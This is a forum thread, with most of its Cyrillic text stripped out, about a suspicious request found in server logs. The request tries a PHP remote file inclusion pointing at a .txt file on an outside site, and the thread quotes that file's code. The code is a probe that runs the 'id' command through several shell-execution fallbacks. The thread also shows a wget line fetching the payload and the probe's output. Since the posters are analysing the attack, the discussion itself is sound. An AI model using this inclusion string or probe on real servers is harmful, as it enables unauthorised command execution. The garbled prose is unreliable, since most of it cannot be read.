Thread: PHP .

  1. #1
    Creative destructor OgiDogi's Avatar
    Join Date: Nov:2002
    Location:
    Posts: 7,601

    PHP .

    - ( ) , . :

    : /index.php?hhTest=http://www.hotelberberys.pl/includes/domit/ips.txt?

    Code:
    <?php
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;
    : ?

  2. #2
    Registered User
    Join Date: Aug:2006
    Location: Sofia
    Posts: 37
    shell id ( ). id.

  3. #3
    Creative destructor OgiDogi's Avatar
    Join Date: Nov:2002
    Location:
    Posts: 7,601
    Quote Originally Posted by sunless View Post
    shell id ( ). id.
    , "fetch"- (ID) -mail hack/spam. , HTML, PHP, .

  4. #4
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    - '' , , ? , FTP , ? , , , .

  5. #5
    Registered User
    Join Date: Jul:2008
    Location:
    Posts: 1
    $ wget "http://www.hotelberberys.pl/includes/domit/ips.txt"

    ?


  6. #6
    Pesho's Avatar
    Join Date: Nov:2001
    Location: Sofia
    Posts: 5,169
    Quote Originally Posted by OgiDogi View Post
    /index.php?hhTest=http://www.hotelberberys.pl/includes/domit/ips.txt?

    URL , ?

    vulnerable PHP ( ). - @sunless . ( ). , , patch- .., .

  7. #7
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    , , URL- . GET .
    .

    .

    index.php (.. , ) , , eval() include().

  8. #8
    Registered User fly's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 803
    id
    Code:
    $ id
    uid=501(mitkok) gid=20(staff) groups=20(staff),101(com.apple.sharepoint.group.1),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
    :
    Code:
    Mic22uid=70(_www) gid=70(_www) groups=70(_www)
    Last edited by fly; 15th July 2008 at 02:52.

  9. #9
    White awesomeness z0ne's Avatar
    Join Date: Feb:2002
    Location: o
    Posts: 13,331
    Quote Originally Posted by Avast
    http://www.hotelberberys.pl/includes/domit/ips.txt => / => VBS:Malware-gen
    . Avast! .

  10. #10
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    Quote Originally Posted by z0ne View Post
    . Avast! .
    , Avast VBS

  11. #11
    Registered User fly's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 803
    ""

  12. #12
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    "" , .
